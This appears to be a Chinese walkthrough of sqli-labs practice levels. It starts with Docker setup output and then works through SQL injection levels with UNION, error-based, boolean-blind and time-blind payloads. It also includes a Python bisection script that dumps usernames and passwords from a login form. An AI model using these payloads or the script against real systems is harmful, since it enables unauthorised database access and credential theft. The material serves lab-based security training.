Unable to find image 'hello-world:latest' locally latest: Pulling from library/hello-world c1ec31eb5944: Pull complete Digest: sha256:305243c734571da2d100c8c8b3c3167a098cab6049c9a5b066b6021a60fcb966 Status: Downloaded newer image for hello-world:latest
Hello from Docker! This message shows that your installation appears to be working correctly.
To generate this message, Docker took the following steps: 1. The Docker client contacted the Docker daemon. 2. The Docker daemon pulled the "hello-world" image from the Docker Hub. (amd64) 3. The Docker daemon created a new container from that image which runs the executable that produces the output you are currently reading. 4. The Docker daemon streamed that output to the Docker client, which sent it to your terminal.
To try something more ambitious, you can run an Ubuntu container with: $ docker run -it ubuntu bash
Share images, automate workflows, and more with a free Docker ID: https://hub.docker.com/
For more examples and ideas, visit: https://docs.docker.com/get-started/
虽然好像还是出现了小问题不过那句Hello from Docker!出来了就不管了
9.查看是否成功拉取镜像
docker images
返回
1 2
REPOSITORY TAG IMAGE ID CREATED SIZE hello-world latest d2c94e258dcb 18 months ago 13.3kB
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
这下不仅确定是字符型,还是以')为闭合符
1 2 3 4 5 6
?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),version()--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
第四关
判断
?id=2'
没报错,看不出什么闭合
?id=2"
返回You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"2"") LIMIT 0,1' at line 1
闭合符")
后续如前几关
1 2 3 4 5 6
?id=1") order by 3--+ ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
第五关
判断
?id=1'
根据返回结果得为字符型注入,且'闭合,但是页面显示有些奇怪,始终是You are in
看看列数
?id=1' order by 3--+
看看回显位
?id=-1' union select 1,2,3--+
坏了不回显,那么UNION注入不能使用,我们要使用报错注入,这里使用extractvalue函数
?id=1' and extractvalue(1,concat(0x7e,(select database()))) --+
返回
XPATH syntax error: '~security'
继续爆表
1 2 3
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+ ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username ,id , password) from users))) --+
?id=1 and ascii(substr((select database()),1,1))>=100 --+ ?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>=100 --+ ?id=1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() limit 0,1),1,1))>=100 --+ ?id=1 and ascii(substr((select username from users limit 0,1),1,1))>=100 --+
defgetDatabase(): #获取数据库名 global host ans='' for i inrange(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid) param ={"username":payload,"password":"admin"} res = requests.post(host,data=param) if"用户名错误"in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32or mid >= 127: break ans += chr(mid-1) print("database is -> "+ans)
defgetTable(): #获取表名 global host ans='' for i inrange(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i, mid) param = {"username": payload, "password": "admin"} res = requests.post(host,data=param) if"用户名错误"in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32or mid >= 127: break ans += chr(mid-1) print("table is -> "+ans)
defgetColumn(): #获取列名 global host ans='' for i inrange(1,1000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % ( i, mid) param = {"username": payload, "password": "admin"} res = requests.post(host, data=param) if"用户名错误"in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32or mid >= 127: break ans += chr(mid-1) print("column is -> "+ans)
defdumpTable():#脱裤 global host ans='' for i inrange(1,10000): low = 32 high = 128 mid = (low+high)//2 while low < high: payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))<%d)^1#" % ( i, mid) param = {"username": payload, "password": "admin"} res = requests.post(host, data=param) if"用户名错误"in res.text: high = mid else: low = mid+1 mid=(low+high)//2 if mid <= 32or mid >= 127: break ans += chr(mid-1) print("dumpTable is -> "+ans)
dumpTable()
第八关
还是布尔盲注,跟上面一样
第九关
不管怎么写它都不改变页面,可以试试时间盲注了
?id=1' and sleep(3)--+
F12打开看看响应时间花了3.12秒,说明是以'闭合的
接下来就是时间盲注试出所有信息了
1 2 3 4
?id=1' and if(ascii(substr(select database()),1,1)>100,sleep(0),sleep(3))--+ ?id=1' and if(ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)>100,sleep(0),sleep(3))--+ ?id=1' and if(ascii(substr(select column_name from information_schema.columns where table_schema=database() limit 0,1),1,1)>100,sleep(0),sleep(3))--+ ?id=1' and if(ascii(substr(select username from users limit 0,1),1,1)>100,sleep(0),sleep(3))--+